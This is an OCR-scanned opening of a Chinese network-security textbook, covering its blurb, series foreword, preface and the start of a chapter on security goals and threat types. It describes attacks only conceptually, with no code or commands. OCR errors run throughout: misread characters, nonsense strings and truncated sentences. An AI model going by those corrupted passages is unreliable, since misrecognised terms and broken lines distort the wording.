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内 容 简 介 


本 书 是 一 本 网 络 安 全 方面 的 专业 图 书 ,由 浅 入 深 、 内 容 详尽 ,图文并茂 , 系 统 而 又 全 面 地 介绍 了 计算 机 
网 络 安全 技术 。 全 书 共 分 四 部 分 。 第 一 部 分 主要 介绍 计算 机 网 络 安全 基础 知识 、 网 络 安全 的 现状 和 评价 
标准 以 及 在 安全 方面 常用 的 一 些 网 络 命令 ; 第 二 部 分 介绍 了 网 络 安全 的 两 大 体系 结构 的 防御 知识 ,包括 操 
作 系 统 的 安全 ,密码 知识 防火墙 和 入 侵 检测 的 内 容 ; 第 三 部 分 介绍 了 网 络 安全 的 两 大 体系 结构 的 攻击 知 
识 ,主要 介绍 了 一 些 攻击 的 技术 和 方法 ; 第 四 部 分 是 实验 , 共 包括 了 34 个 实验 ,实验 和 前 面 的 理论 相配 套 
使 用 ,通过 实验 更 好 地 体会 网 络 安全 的 理论 知识 。 

本 书 结构 清晰 、 易 教 易学 实例 丰富 、 可 操作 性 强 , 既 可 作为 本 科 和 高 职高 专 院 校 计算 机 专业 类 的 教 
材 , 也 可 作为 各 类 培训 班 的 培训 教材 。 此 外 ,本 书 也 非常 适 于 从 事 计算 机 网 络 安全 技术 研究 与 应 用 人 员 以 
及 自学 人 员 参 考 阅读 。 

本 书 中 的 授课 幻灯 片 和 实验 用 的 工具 软件 都 可 从 http://www. tup. com. cn/ 网 站 下 载 。 


本 书 封面 贴 有 清华 大 学 出 版 社 防伪 标签 ,无 标签 者 不 得 销售 。 
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出 版 说 明 


由 于 网 络 应 用 越 来 越 普及 ,信息 化 的 社会 已 经 呈现 出 越 来 越 广阔 的 前 景 ,可 以 表 定 地 说 ， 
在 未 来 的 社会 中 电子 支付 ` 电 子 银行 ,电子 政务 以 及 多 方面 的 网 络 信息 服务 将 深入 到 人 
类 生活 的 方方面面 。 同 时 , 随 之 面临 的 信息 安全 问题 也 日 益 突出 ,非法 访问 、 信 息 窃 取 、 
甚至 信息 犯罪 等 恶意 行为 导致 信息 的 严重 不 安全 。 信 息 安全 问题 已 由 原来 的 军事 国防 
领域 扩展 到 了 整个 社会 ,因此 社会 各 界 对 信息 安全 人 才 有 强烈 的 需求 。 

信息 安全 本 科 专 业 是 2000 年 以 来 结合 我 国 特色 开设 的 新 的 本 科 专 业 , 是 计算 机 、 
通信 、 数 学 等 领域 的 交叉 学 科 , 主 要 研究 确保 信息 安全 的 科学 和 技术 。 自 专业 创办 以 
来 ,各 个 高 校 在 课程 设置 和 教材 研究 上 一 直 处 于 探索 阶段 。 但 各 高 校 由 于 本 身 专 业 设 
置 上 来 自 于 不 同 的 学 科 , 如 计算 机 、 通 信和 数学 等 ,在 课程 设置 上 也 没有 统一 的 指导 规 
范 ,在 课程 内 容 、 深 浅 程度 和 课程 衔接 上 ,存在 模糊 不 清 、 内 容重 倒 、 知 识 覆 盖 不 全 面 等 
现象 。 因 此 ,根据 信息 安全 类 专业 知识 体系 所 覆盖 的 知识 点 ,系统 地 研究 目前 信息 安全 
专业 教学 所 涉及 的 核心 技术 的 原理 ,实践 及 其 应 用 ,合理 规划 信息 安全 专业 的 核心 课 
程 ,在 此 基础 上 提出 适合 我 国信 息 安 全 专业 教学 和 人 才 培 养 的 核心 课程 的 内 容 框架 和 
知识 体系 ,并 在 此 基础 上 设计 新 的 教学 模式 和 教学 方法 ,对 进一步 提高 国内 信息 安全 专 
业 的 教学 水 平和 质量 具有 重要 的 意义 。 

为 了 进一步 提高 国内 信息 安全 专业 课程 的 教学 水 平和 质量 ,培养 适应 社会 经 济 发 
展 需要 的 、 兼 具 研究 能 力 和 工程 能 力 的 高 质量 专业 技术 人 才 。 在 教育 部 相关 教学 指导 
委员 会 专家 的 指导 和 建议 下 ,清华 大 学 出 版 社 与 国内 多 所 重点 大 学 共同 对 我 国信 息 安 
全 人 才 培 养 的 课程 框架 和 知识 体系 ,以 及 实践 教学 内 容 进 行 了 深入 的 研究 ,并 在 该 基础 
上 形成 了 “信息 安全 人 才 需 求 与 专业 知识 体系 、 课 程 体系 的 研究 ”等 研究 报告 。 

本 系列 教材 是 在 课程 体系 的 研究 基础 上 总 结 、 完 善 而 成 ,力求 充分 体现 科学 性 、 先 
进 性 .工程 性 ,突出 专业 核心 课程 的 教材 ,兼顾 具有 专业 教学 特点 的 相关 基础 课程 教材 ， 
探索 具有 发 展 潜力 的 选修 课程 教材 ,满足 高 校 多 层次 教学 的 需要 。 

本 系列 教材 在 规划 过 程 中 体现 了 如 下 一 些 基 本 组 织 原则 和 特点 。 

(1) 反映 信息 安全 学 科 的 发 展 和 专业 教育 的 改革 ,适应 社会 对 信息 安全 人 才 的 培 
养 需 求 ,教材 内 容 坚持 基本 理论 的 扎实 和 清晰 ,反映 基本 理论 和 原理 的 综合 应 用 ,在 其 
基础 上 强调 工程 实践 环节 ,并 及 时 反映 教学 体系 的 调整 和 教学 内 容 的 更 新 。 

(2) 反映 教学 需要 ,促进 教学 发 展 。 教 材 要 适应 多 样 化 的 教学 需要 ,正确 把 握 教学 
内 容 和 课程 体系 的 改革 方向 ,在 选择 教材 内 容 和 编写 体系 时 注意 体现 素质 教育 、 创 新 能 
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力 与 实践 能 力 的 培养 ,为 学 生 知识 能力、 素质 协调 发 展 创造 条 件 。 

(3) 实施 精品 战略 ,突出 重点 。 规 划 教 材 建 设 把 重点 放 在 专业 核心 (基础 ) 课 程 的 教材 
建设 上 ; 特别 注意 选择 并 安排 一 部 分 原来 基础 比较 好 的 优秀 教材 或 讲义 修订 再 版 ,逐步 形 
成 精品 教材 ; 提倡 并 鼓励 编写 体现 工程 型 和 应 用 型 的 专业 教学 内 容 和 课程 体系 改革 成 果 的 
教材 。 

(4) 支持 一 纲 多 本 ,合理 配套 。 专 业 核 心 课 和 相关 基础 课 的 教材 要 配套 ,同一 门 课程 可 
以 有 多 本 具有 各 自 内 容 特点 的 教材 。 处 理 好 教材 统一 性 与 多 样 化 ,基本 教材 与 辅助 教材 教 
学 参考 书 ,文字 教材 与 软件 教材 的 关系 ,实现 教材 系列 资源 的 配套 。 

(5) 依靠 专家 ,择优 落实 。 在 制定 教材 规划 时 依靠 各 课程 专家 在 调查 研究 本 课程 教材 
建设 现状 的 基础 上 提出 规划 选 题 。 在 落实 主编 人 选 时 ,要 引入 竞争 机 制 , 通 过 申报 .评审 确 
定 主编 。 书 稿 完成 后 认真 实行 审 稿 程序 ,确保 出 书 质量 。 

繁荣 教材 出 版 事业 ,提高 教材 质量 的 关键 是 教师 。 建 立 一 支 高 水 平 的 、 以 老 带 新 的 教材 
编写 队伍 才能 保证 教材 的 编写 质量 ,希望 有 志 于 教材 建设 的 教师 能 够 加 入 到 我 们 的 编写 队 
伍 中 来 。 
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随 着 我 国 社会 经 济 和 信息 技术 的 发 展 ,计算 机 网 络 已 经 渗透 到 我 们 生活 的 方方面面 。 然 
而 由 于 网 络 自身 固有 的 脆弱 ,使 网 络 安全 存在 很 多 潜在 的 威胁 。 在 当今 这 样 “数字 经 
济 ” 的 时 代 , 网 络 安全 显得 尤为 重要 ,也 受到 人 们 越 来 越 多 的 关注 。 网 络 安 全 技术 课程 
已 经 成 为 计算 机 类 及 网 络 工程 专业 的 必修 课程 ,本 书 可 作为 本 科 院 校 高 等 职业 院 校 、 
成 人 教育 计算 机 网 络 .通信 工程 等 专业 的 教材 ,也 可 作为 网 络 安全 的 培训 教材 。 

全 书 分 为 四 个 部 分 ,具体 内 容 介绍 如 下 : 

第 一 部 分 是 网 络 安全 基础 知识 ,包括 两 章 : 第 1 章 为 计算 机 网 络 安全 概述 ,介绍 了 
网 络 安全 的 定义 、 基 本 要 求 . 网 络 安全 的 两 大 体系 结构 、 网 络 安全 的 现状 、 立 法 和 评价 标 
准 。 第 2 章 为 网 络 安全 协议 基础 ,分 析 了 IP 协议 .TCP 协议 .UDP 协议 和 ICMP 协议 
的 结构 并 介绍 了 一 些 常用 的 网 络 命令 。 

第 二 部 分 是 网 络 安全 防御 技术 ,包括 三 章 : 第 3 章 为 操作 系统 的 安全 配置 ,介绍 了 
Linux 下 的 安全 守则 和 Windows Server 的 安全 配置 。 第 4 章 为 密码 学 基础 ,介绍 了 密 
码 学 的 基本 概念 和 三 种 加 密 算 法 ,数字 签名 和 数字 信封 ,数字 水 印 技术 等 。 第 5 章 为 防 
火 墙 与 人 侵 检测 ,介绍 了 防火 墙 和 和 人 侵 检测 的 定义 ,以 及 防火 墙 的 分 类 及 建立 步骤 ,人 
侵 检 测 的 方法 ,它们 的 区 别 与 联系 。 

第 三 部 分 是 网 络 安全 攻击 技术 ,包括 三 章 : 第 6 章 为 黑客 与 攻击 方法 ,介绍 了 黑客 
攻击 的 五 部 曲 , 以 及 相关 的 攻击 工具 与 SQL 注入 攻击 EBG KSS 攻击 。 第 7 章 为 
DoS fil DDoS, 介 绍 了 SYN 风暴 、Smurf 攻击 以 及 DDoS 的 特点 。 第 8 章 为 网 络 后 门 与 
隐身 ,介绍 了 后 门 的 定义 及 实现 后 门 和 隐身 的 方法 。 

第 四 部 分 是 实验 ,包括 全 部 章节 的 34 个 实验 。 

本 书 在 讲解 相关 理论 的 同时 , 附 有 大 量 的 图 例 , 尤 其 是 第 四 部 分 实验 ,图 片 就 有 
180 多 个 ,做 到 了 理论 知识 和 实际 操作 的 紧密 结合 。 本 书 是 一 本 讲授 用 的 教材 ,又 是 一 
本 实用 的 实验 指导 书 。 

本 书 由 马 丽 梅 . 王 长 广 . 马 彦 华 主编 , 赵 冬 梅 教授 主 审 ,参加 本 书 编写 的 还 有 郭 哺 、 
于 富强 , 李 瑞 台 、 侯 卫 红 \ 李 大 顺 、 悦 东明 、 井 波 、 王 天 马 等 ,本 教材 总 计 分 9 章 , 其 中 具体 
的 编写 任务 如 下 : 本 书 第 1 章 由 马 丽 梅 编写 ,第 2 章 由 王 长 广 编写 ,第 3 章 由 郭 哺 、 马 
丽 梅 编写 ,第 4 章 由 马 丽 梅 . 于 富强 编写 ,第 5 章 由 马 丽 梅 . 李 瑞 台 编写 ,第 6 章 由 马 彦 
华 编写 ,第 7 章 由 马 丽 梅 编写 ,第 8 章 由 侯 卫 红 编 写 , 第 9 章 实验 由 马 丽 梅 指导 ,北京 林 
业 大 学 经 济 管理 学 院 王 天 马 ,河北 师范 大 学 汇 华 学 院 李 大 顺 、 悦 东明 、 井 波 共同 完成 。 
全 书 由 马 丽 梅 统 稿 。 
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第 1 章 计算 机 网 络 安全 概述 


E 掌握 网 络 安全 的 定义 、 网 络 安全 的 基本 要 求 、 网 络 安全 的 两 大 体系 : 攻击 和 防御 。 
E 了 解 网 络 安全 的 现状 、 网 络 立 法 和 评价 标准 。 


随 着 我 国 社会 经 济 的 发 展 , 计 算 机 网 络 也 迅速 普及 ,渗透 到 我 们 生活 的 方方面面 。 然 而 
由 于 网 络 自 身 固有 的 脆弱 ,网 络 安全 存在 很 多 潜在 的 威胁 。 在 当今 这 样 “ 数 字 经 济 ” 的 时 代 ， 
网 络 安全 显得 尤为 重要 ,也 受到 人 们 越 来 越 多 的 关注 。 

计算 机 网 络 安全 面临 的 问题 很 多 ,可 以 分 为 以 下 三 种 。 

1. 自然 灾害 

计算 机 信息 系统 仅仅 是 一 个 智能 的 机 器 , 易 受 自然 灾害 及 环境 (温度 ,湿度 .振动 .冲击 、 
污染 ) 的 影响 。 目 前 ,我 们 不 少 计算 机 房 抵御 自然 灾害 和 意外 事故 的 能 力 较 差 , 日 常 工作 中 
因 断 电 而 导致 设备 损坏 .数据 丢失 的 现象 时 有 发 生 。 由 于 噪声 和 电磁 辐射 ,网 络 信 噪 比 下 
降 , 误 码 率 增加 ,信息 的 安全 性 、 完 整 性 和 可 用 性 受到 威胁 。 

2. 黑客 攻击 

这 种 人 为 的 恶意 攻击 是 计算 机 网 络 所 面临 的 最 大 威胁 ,也 是 网 络 安 全 防范 策略 的 首要 
对 象 。 黑 客 一 旦 非法 入 侵 资源 共享 广泛 的 政治 、 军 事 ,经 济 和 科学 等 领域 ,次 用 、 暴 露 和 算 改 
大 量 在 网 络 中 存储 和 传输 的 数据 ,其 造成 的 损失 是 无 法 估量 的 。 

3. 计算 机 病毒 

计算 机 病毒 是 一 种 会 通过 修改 其 他 程序 来 把 自身 或 其 变种 复制 进去 的 程序 。 种 类 繁多 
的 计算 机 病毒 ,如 "CIH”“ 情 人 节 ”“ 熊 猫 烧香 ”"、“ 蠕 虫 ”“ 木 马 ”等 病毒 利用 自身 的 “传染 ” 
能 力 ,严重 破坏 数据 资源 ,影响 计算 机 使 用 功能 ,甚至 导致 计算 机 系统 次 痪 。 目 前 ,几乎 
80% 应 用 网 络 都 受到 过 计算 机 病毒 的 侵害 。 


1.1 信息 安全 和 网 络 安 全 


信息 安全 是 一 门 涉及 计算 机 科学 、 网 络 技术 .通信 技术 、 密 码 技术 .信息 安 全 技术 .应 用 
数学 .数论 .信息 论 等 多 种 学 科 的 综合 性 学 科 ,是 一 门 交叉 学 科 。 广 义 上 讲 ,信息 安全 涉及 多 
方面 的 理论 和 应 用 知识 ,除了 数学 .通信 、 计 算 机 等 自然 科学 外 ,还 涉及 法 律 ,心理 学 等 社会 
科学 ,而 网 络 安全 是 信息 安全 学 科 的 重要 组 成 部 分 。 

计算 机 网 络 安全 被 计算 机 网 络 安 全 国际 标准 化 组 织 (International Organization for 
Standardization ,ISO) 定 义 为 : 计算 机 网 络 安全 是 指 网 络 系统 的 硬件 、 软 件 及 其 系统 中 的 数 
据 受 到 保护 ,不 因 偶 然 的 或 者 恶意 的 原因 而 遭受 到 破坏 更改. 泄露 ,系统 连续 可 靠 正 常 地 运 
行 , 网 络 服务 不 中 断 。 网 络 安全 包含 网 络 设备 安全 、 网 络 信息 安全 、 网 络 软件 安全 。 从 广义 来 
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说 ,凡是 涉及 网 络 上 信息 的 保密 性 完整 性 可用性、 真实 性 和 可 控 性 的 相关 技术 和 理论 都 是 
网 络 安全 的 研究 领域 。 


1.1.1 网 络 安全 的 基本 要 求 


信息 安全 的 目标 是 保护 信息 的 保密 性 、 机 密 性 、 完 整 性 、 可 用 性 、 可 靠 性 、 不 可 抵赖 性 和 
可 控 性 ,也 有 观点 认为 是 机 密 性 、 完 整 性 和 可 用 性 , 即 CIA (Confidentiality, Integrity and 
Availability) 。 

1. 机 密 性 ,保密 性 (Confidentiality) 

机 密 性 是 指 保 证 信息 不 能 被 非 授权 访问 ,即使 非 授 权 用 户 得 到 信息 也 无 法 知晓 信息 内 
容 , 因 而 不 能 使 用 。 保 密 性 是 指 网 络 信息 不 被 泄露 给 非 授 权 的 用 户 、 实 体 或 过 程 , 即 信息 只 
为 授权 用 户 使 用 。 保 密 性 是 在 可 靠 性 和 可 用 性 基础 之 上 ,保障 网 络 信息 安全 的 重要 手段 。 
常用 的 保密 技术 包括 以 下 几 项 。 

(1) 物理 保密 : 利用 各 种 物理 方法 ,如 限制 隔离、 掩 项、 控制 等 措施 ,保护 信息 不 被 
泄露 。 

(2) Bj Si Wr; 使 对 手 接收 不 到 有 用 的 信息 。 

CD 防 辐射 : 防止 有 用 信息 以 各 种 途径 辐射 出 去 。 

(4) 信息 加 密 : 在 密 钥 的 控制 下 ,用 加 密 算法 对 信息 进行 加 密 处 理 , 即 使 对 手 得 到 了 加 
密 后 的 信息 也 会 因为 没有 密 钥 而 无 法 读 懂 有 效 信息 。 

2. 完整 性 (Integrity) 

完整 性 是 网 络 信息 未 经 授权 不 能 进行 改变 的 特性 , 即 网 络 信息 在 存储 或 传输 过 程 中 保 
持 不 被 偶然 或 著 意 地 删除 .修改 伪造. 乱 序 , 重 放 、 插 和 人 等 破坏 和 丢失 的 特性 。 完 整 性 是 一 
种 面向 信息 的 安全 性 , 它 要 求 保 持 信 息 的 原样 , 即 信息 的 正确 生成 .正确 存储 和 正确 传输 。 
信息 的 完整 性 包括 两 个 方面 : 

CD 数据 完整 性 : 数据 没有 被 未 授权 算 改 或 者 损坏 。 

O 系统 完整 性 : 系统 未 被 非法 操纵 , 按 既 定 的 目标 运行 。 

完整 性 与 保密 性 不 同 ,保密 性 要 求 信息 不 被 泄露 给 未 授权 的 人 ,而 完整 性 则 要 求 信 息 不 
致 受到 各 种 原因 的 破坏 。 影 响 网 络 信息 完整 性 的 主要 因素 有 : 设备 故障 、 误 码 ( 传 输 、 处 理 
和 存储 过 程 中 产生 的 误 码 ,定时 的 稳定 度 和 精度 降低 造成 的 误 码 ,各 种 干扰 源 造 成 的 误 码 )、 
人 为 攻击 .计算 机 病毒 等 。 保 障 网 络 信息 完整 性 的 主要 方法 有 以 下 几 种 。 

CD 协议 : 通过 各 种 安全 协议 可 以 有 效 地 检测 出 被 复制 的 信息 、 被 删除 的 字段 .失效 的 
字段 和 被 修改 的 字段 。 

(2) 纠 错 编码 方法 : 由 此 完成 检 错 和 纠 错 功能 ,最 简单 和 常用 的 纠 错 编码 方法 是 奇偶 

(3) 密码 校 验 和 方法 : 它 是 抗 算 改 和 防止 传输 失败 的 重要 手段 。 

(4) 数字 签名 : 保障 信息 的 真实 性 。 

(5) 公证 : 请 求 网 络 管理 或 中 介 机 构 证 明 信 息 的 真实 性 。 

3. 可 用 性 (Availability) 

可 用 性 是 指 保障 信息 资源 随时 可 提供 服务 的 能 力 特 性 , 即 授权 用 户 根据 需要 可 以 随时 
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访问 所 需 信 息 。 可 用 性 是 信息 资源 服务 功能 和 性 能 可 靠 性 的 度量 W LV PR Led f IR E LC 
据 、 应 用 和 用 户 等 多 方面 的 因素 ,是 对 信息 网 络 总 体 可 靠 性 的 要 求 。 可 用 性 还 应 该 满足 以 下 
要 求 。 

(1) 身份 识别 与 确认 。 

(2) 访问 控制 : 对 用 户 的 权限 进行 控制 ,只 能 访问 相应 权限 的 资源 ,防止 或 限制 经 隐蔽 
通道 的 非法 访问 ,包括 自主 访问 控制 和 强制 访问 控制 。 

(3) 业务 流 控制 : 利用 均 分 负荷 方法 ,防止 业务 流量 过 度 集中 而 引起 网 络 阻塞 。 

(4) 路 由 选择 控制 : 选择 那些 稳定 可 靠 的 子 网 ,中 继 线 或 链 路 等 。 

(5) 审计 跟踪 : 把 网 络 信息 系统 中 发 生 的 所 有 安全 事件 情况 存储 在 安全 审计 跟踪 之 
中 ,以 便 分 析 原因 ,分 清 责任 ,及 时 采取 相应 的 措施 。 审 计 跟 踪 的 信息 主要 包括 事件 类 型 .被 
管 客体 等 级 .事件 时 间 、 事 件 信 息 、 事 件 回答 以 及 事件 统计 等 方面 的 信息 。 

AAA: 访问 控制 (Access Control) 就 是 在 身份 认证 的 基础 上 ,依据 授权 对 提出 的 
资源 访问 请 求 加 以 控制 。 访 问 控制 是 网 络 安全 防范 和 保护 的 主要 策略 , 它 可 以 限制 对 关键 
资源 的 访问 ,防止 非法 用 户 的 侵入 或 合法 用 户 的 不 慎 操 作 所 造成 的 破坏 。 

例如 用 户 的 入 网 访问 控制 。 用 户 的 入 网 控制 可 分 为 三 个 步 又; 用 户 名 的 识别 与 验证 、 
用 户口 令 的 识别 与 验证 .用 户 账 号 的 默认 限制 检查 。 用 户 账号 应 只 有 系统 管理 员 才 能 建立 。 
口令 控制 应 该 包括 最 小 口令 长 度 . 强 制 修改 口令 的 时 间 间 隔 ` 口 令 的 唯一 性 .口令 过 期 失效 
后 允许 人 网 的 宽 限 次 数 等 。 网 络 应 能 控制 用 户 登 录入 网 的 站 点 (地 址 )、. 限 制 用 户 人 网 的 时 
间 、 限 制 用户 人 网 的 工作 站 数量 。 当 用 户 对 交 费 网 络 的 访问 “资费 "用 尽 时 ,网络 还 应 能 对 用 
户 的 账号 加 以 限制 ,用户 此 时 应 无 法 进入 网 络 访问 网 络 资源 。 网 络 信息 系统 应 对 所 有 用 户 
的 访问 进行 审计 。 

4. 可 靠 性 (Reliability) 

可 靠 性 是 网 络 信息 系统 能 够 在 规定 条 件 下 和 规定 的 时 间 内 完成 规定 的 功能 的 特性 。 可 
靠 性 是 系统 安全 的 最 基本 要 求 之 一 ,是 所 有 网 络 信息 系统 的 建设 和 运行 目标 。 可 靠 性 主要 
表现 在 硬件 可 靠 性 、 软 件 可 靠 性 、 人 员 可 靠 性 、 环 境 可 靠 性 等 方面 。 硬 件 可 靠 性 最 为 直观 和 
常见 。 软 件 可 靠 性 是 指 在 规定 的 时 间 内 ,程序 成 功 运行 的 概率 。 人 员 可 靠 性 是 指 人 员 成 功 
地 完成 工作 或 任务 的 概率 。 人 员 可 靠 性 在 整个 系统 可 靠 性 中 扮演 重要 角色 ,因为 系统 失效 
大 部 分 是 人 为 差错 造成 的 。 人 的 行为 要 受到 生理 和 心理 的 影响 ,受到 其 技术 熟练 程度 .责任 
心 和 品德 等 素质 方面 的 影响 。 因 此 ,人 员 的 教育 .培养 .训练 和 管理 以 及 合理 的 人 机 界面 是 
提高 可 靠 性 的 重要 方面 。 环 境 可 靠 性 是 指 在 规定 的 环境 内 ,保证 网 络 成 功 运行 的 概率 。 这 
里 的 环境 主要 是 指 自然 环境 和 电磁 环境 。 网 络 信息 系统 的 可 靠 性 测度 主要 有 三 种 : DUSR 
性 .生存 性 和 有 效 性 。 

CD 抗 毁 性 是 指 系统 在 人 为 破坏 下 的 可 靠 性 。 例 如 ,部 分 线路 或 节点 失效 后 ,系统 是 否 
仍然 能 够 提供 一 定 程度 的 服务 。 增 强 抗 毁 性 可 以 有 效 地 避免 因 各 种 灾害 (战争 .地 震 等 ) 造 
成 的 大 面积 瘫 痰 事件 。 

(2) 生存 性 是 在 随机 破坏 下 系统 的 可 靠 性 。 生 存 性 主要 反映 随机 性 破坏 和 网 络 拓 扑 结 
构 对 系统 可 靠 性 的 影响 。 这 里 ,随机 性 破坏 是 指 系统 部 件 因为 自然 老化 等 造成 的 自然 失效 。 

CD 有 效 性 是 一 种 基于 业务 性 能 的 可 靠 性 。 有 效 性 主要 反映 在 网 络 信息 系统 的 部 件 失 
效 情况 下 ,满足 业务 性 能 要 求 的 程度 。 比 如 ,网 络 部 件 失效 虽然 没有 引起 连接 性 故障 ,但 是 
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却 造 成 质量 指标 下 降 ,平均 延 时 增加 、 线 路 阻塞 等 现象 。 

5. 不 可 抵赖 性 (真实 性 ,也 称 作 不 可 否认 性 ) 

在 网 络 信息 系统 的 信息 交互 过 程 中 ,确信 参与 者 的 真实 同一 性 。 即 所 有 参与 者 都 不 可 
能 否认 或 抵赖 曾经 完成 的 操作 和 承诺 。 利 用 信息 源 证 据 可 以 防止 发 信 方 不 真实 地 否认 已 发 
送信 息 ,利用 递交 接收 证 据 可 以 防止 收 信 方 事后 否认 已 经 接收 的 信息 。 

6. 可 控 性 (可 说 明 性 ) 

可 控 性 是 对 网 络 信息 的 传播 及 内 容 具 有 控制 能 力 的 特性 , 即 确保 个 体 的 活动 可 被 跟踪 o 
概括 地 说 ,网 络 信息 安全 与 保密 的 核心 是 通过 计算 机 、 网 络 、 密 码 技术 和 安全 技术 ,保护 在 公 
用 网 络 信息 系统 中 传输 交换 和 存储 的 消息 的 保密 性 、 完 整 性 \ 真 实 性 .可靠 性 .可 用 性 、 不 可 


1.1.2 网 络 安全 面临 的 威胁 


所 谓 的 安全 威胁 是 指 某 个 实体 (人 事件 ,程序 等 ) 对 某 一 资源 的 机 密 性 完整 性 、 可 用 性 
在 合法 使 用 时 可 能 造成 的 危害 。 这 些 可 能 出 现 的 危害 ,是 某 些 别有用心 的 人 通过 一 定 的 攻 
击 手段 来 实现 的 。 

安全 威胁 可 分 成 故意 的 (如 系统 入 侵 ) 和 偶然 的 (如 将 信息 发 到 错误 地 址 ) 两 类 。 故 意 威 
胁 又 可 进一步 分 成 被 动 威胁 和 主动 威胁 两 类 。 被 动 威胁 只 对 信息 进行 监听 ,而 不 对 其 修改 
和 破坏 。 主 动 威胁 则 对 信息 进行 故意 算 改 和 破坏 ,使 合法 用 户 得 不 到 可 用 信息 ,具体 包括 物 
理 威胁 、 系 统 漏洞 造成 的 威胁 、 身 份 鉴别 威胁 、 线 缆 连 接 威 胁 、 有 害 程 序 造成 的 威胁 等 方面 的 
威胁 。 

1. 物理 威胁 

物理 威胁 包括 4 个 方面 : 偷窃 .废物 搜寻 、 间 谍 行 为 和 身份 识别 错误 。 

COD 偷窃 

Vil £i 2z 4 v f ffr 03 6148 fr 03 t 6 .偷窃 信 息 和 偷窃 服务 等 内 容 。 如 果 他 们 想 偷 的 信息 
在 计算 机 里 , 那 他 们 一 方面 可 以 将 整 台 计算 机 偷 走 , 另 一 方面 可 以 通过 监视 器 读 取 计算 机 中 
的 信息 。 

(2) 废物 搜寻 

废物 搜寻 就 是 在 废物 (如 一 些 打 印 出 来 的 材料 或 废弃 的 软盘 ) 中 搜寻 所 需要 的 信息 。 在 
微型 计算 机 上 ,废物 搜寻 可 能 包括 从 未 抹 掉 有 用 信息 的 软盘 或 硬盘 上 获得 有 用 资料 。 

G) 间谍 行为 

间谍 行为 是 一 种 为 了 省 钱 或 获取 有 价值 的 机 密 ,采用 不 道德 的 手段 获取 信息 的 活动 ,有 
时 政府 也 有 可 能 卷 人 这 种 间谍 活动 中 。 

(4) 身份 识别 错误 

身份 识别 错误 是 指 非 法 建立 文件 或 记录 ,企图 把 它们 作为 有 效 的 、 正 式 生产 的 文件 或 记 
录 。 如 对 具有 身份 鉴别 特征 的 物品 (如 护照 ` 执 照 . 出 生 证 明 或 加 密 的 安全 卡 等 ) 进 行 伪 造 ， 
就 属于 身份 识别 发 生 错误 的 范畴 ,这 种 行为 对 网 络 数据 构成 了 巨大 的 威胁 。 

2. 系统 漏洞 造成 的 威胁 

系统 漏洞 造成 的 威胁 包括 三 个 方面 : 乘虚 而 人、 不 安全 服务 和 配置 以 及 初始 化 错误 。 
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CD 乘虚 而 人 

例如 ,用户 A 停止 了 与 某 个 系统 的 通信 ,但 由 于 某 种 原因 仍 使 该 系统 上 的 一 个 端口 处 
于 激活 状态 ,这 时 ,用 户 B 通 过 这 个 端口 开始 与 该 系统 通信 ,这 样 就 不 必 通 过 任何 申请 使 用 
端口 的 安全 检查 了 。 

(2) 不 安全 服务 

有 时 操作 系统 的 一 些 服务 程序 可 以 绕 过 机 器 的 安全 系统 。 互 联网 蠕虫 就 利用 了 UNIX 
系统 中 三 个 可 绕 过 的 机 制 。 蠕 虫 利用 sendmail 程序 已 存在 的 一 个 漏洞 来 获取 其 他 机 器 的 
控制 权 。 病 毒 一 般 会 利用 rexec.fingerd 或 者 口令 猜 解 来 尝试 连接 。 在 成 功 入 侵 之 后 , 它 会 
在 目标 机 器 上 编译 源 代码 并 且 执 行 它 , 而 且 会 有 一 个 程序 来 专门 负责 隐藏 自己 的 脚印 。 

(3) 配置 和 初始 化 错误 

如 果 不 得 不 关 掉 一 台 服 务 器 以 维修 它 的 某 个 子 系统 , 几 天 后 当 重 启 服 务 器 时 ,可 能 会 招 
致 用 户 的 抱怨 ,说 他 们 的 文件 丢失 了 或 被 算 改 了 ,这 就 有 可 能 是 在 系统 重新 初始 化 时 ,安全 
系统 没有 正确 地 初始 化 ,从 而 留 下 了 安全 漏洞 让 人 利用 。 类 似 的 问题 在 木马 程序 修改 了 系 
统 的 安全 配置 文件 时 也 会 发 生 。 

3. 身份 鉴别 造成 威胁 

身份 鉴别 造成 的 威胁 包括 4 个 面 : 口令 圈套 .口令 破解 .算法 考虑 不 周 和 编 辑 口令 。 

(D 口令 圈套 

口令 圈套 是 网 络 安全 的 一 种 诡计 ,与 冒名 顶替 有 关 。 常 用 的 口令 圈套 通过 一 个 编译 代 
码 模块 实现 , 它 运 行 起 来 和 登录 界面 一 模 一 样 ,被 插入 到 正常 的 登录 过 程 之 前 ,最 终 用 户 看 
到 的 只 是 先后 两 个 登录 界面 ,第 一 次 登录 失败 了 ,所 以 用 户 被 要 求 再 输入 用 户 名 和 口令 。 实 
际 上 ,第 一 次 登录 并 没有 失败 , 它 将 登录 数据 如 用 户 名 和 口令 , 写 入 到 这 个 数据 文件 中 ,留待 
使 用 。 

(2) 口令 破解 

口令 破解 就 像 是 猜测 自行 车 密码 锁 的 数字 组 合 一 样 ,在 该 领域 中 已 形成 许多 能 提高 成 
功率 的 技巧 。 

(3) 算法 考虑 不 周 

口令 输入 过 程 必须 在 满足 一 定 条 件 下 才能 正常 地 工作 ,这 个 过 程 通过 某 些 算法 实 
现 。 在 一 些 攻击 入 侵 案 例 中 ,入 侵 者 采用 超 长 的 字符 串 破坏 了 口令 算法 ,成 功 地 进入 了 

(4) 编辑 口令 

编辑 口令 需要 依靠 操作 系统 漏洞 ,如 果 公 司 内 部 的 人 建立 了 一 个 虚设 的 账户 或 修改 
了 一 个 隐 含 账户 的 口令 ,这 样 ,任何 知道 那个 账户 的 用 户 名 和 口令 的 人 便 可 以 访问 该 机 
器 了 。 

4. 线 缆 连 接 造 成 的 威胁 

线 缆 连 接 造 成 的 威胁 包括 三 个 方面 : 窃听 ,拨号 进入 和 冒名 顶替 。 

CD 窃听 

对 通信 过 程 进行 窃听 可 达到 收集 信息 的 目的 ,这 种 电子 窃听 不 一 定 需要 窃听 设备 一 定 
安装 在 电缆 上 ,通过 检测 从 连 线 上 发 射出 来 的 电磁 辐射 就 能 拾取 所 要 的 信号 。 为 了 使 机 构 
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内 部 的 通信 有 一 定 的 保密 性 ,可 以 使 用 加 密 手段 来 防止 信息 被 解密 。 

(2) 拨号 进入 

拥有 一 个 调制 解 调 器 和 一 个 电话 号 码 ,每 个 人 都 可 以 试图 通过 远程 拨号 访问 网 络 ,尤其 
是 拥有 所 期 望 攻击 的 网 络 的 用 户 账 户 时 ,就 会 对 网 络 造成 很 大 的 威胁 。 

(3) 冒名 顶替 

冒名 顶替 指 通 过 使 用 别人 的 密码 和 账号 ,获得 对 网 络 及 其 数据 ,程序 的 使 用 能 力 。 这 种 
